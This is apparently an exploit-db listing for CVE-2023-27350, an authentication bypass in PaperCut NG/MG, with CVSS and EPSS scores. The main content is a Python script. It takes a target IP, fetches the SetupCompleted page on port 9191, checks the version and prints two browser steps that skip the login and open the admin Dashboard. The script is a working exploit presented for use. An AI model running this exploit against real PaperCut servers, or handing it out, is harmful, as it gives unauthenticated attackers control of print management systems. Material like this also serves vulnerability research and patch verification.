PaperCut NG/MG 22.0.4 - Authentication Bypass

2023-04-2500:00:00

MaanVader

www.exploit-db.com

316

papercut ng/mg

authentication bypass

vendor

version 8.0

vulnerable

cve-2023-27350

exploit

html

browser

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.5 High

AI Score

Confidence

High

0.971 High

EPSS

Percentile

99.8%

JSON

# Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass
# Date: 21 April 2023
# Exploit Author: MaanVader
# Vendor Homepage: https://www.papercut.com/
# Version: 8.0 or later
# Tested on: 22.0.4
# CVE: CVE-2023-27350

import requests
from bs4 import BeautifulSoup
import re

def vuln_version():
    ip = input("Enter the ip address: ")
    url = "http://"+ip+":9191"+"/app?service=page/SetupCompleted"
    response = requests.get(url)
    soup = BeautifulSoup(response.text, 'html.parser')
    text_div = soup.find('div', class_='text')
    product_span = text_div.find('span', class_='product')

    # Search for the first span element containing a version number
    version_span = None
    for span in text_div.find_all('span'):
        version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())
        if version_match:
            version_span = span
            break

    if version_span is None:
        print('Not Vulnerable')
    else:
        version_str = version_span.text.strip()
        print('Version:', version_str)
        print("Vulnerable version")
        print(f"Step 1 visit this url first in your browser: {url}")
        print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard")


if __name__ =="__main__":
    vuln_version()